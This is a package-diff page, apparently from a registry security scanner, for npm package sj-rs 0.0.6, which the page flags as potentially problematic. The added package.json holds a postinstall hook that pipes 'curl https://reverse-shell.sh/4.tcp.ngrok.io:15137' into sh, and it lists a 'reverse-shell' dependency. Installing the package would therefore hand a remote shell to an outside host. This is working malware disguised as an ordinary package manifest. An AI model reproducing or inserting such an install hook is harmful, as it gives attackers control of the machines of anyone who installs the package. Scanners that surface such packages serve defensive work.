sj-rs 0.0.6

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of sj-rs might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +14 -0
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "sj-rs",
3
+ "version": "0.0.6",
4
+ "description": "sj-rs",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "curl https://reverse-shell.sh/4.tcp.ngrok.io:15137 | sh"
8
+ },
9
+ "dependencies": {
10
+ "reverse-shell": "latest"
11
+ },
12
+ "author": "sj",
13
+ "license": "ISC"
14
+ }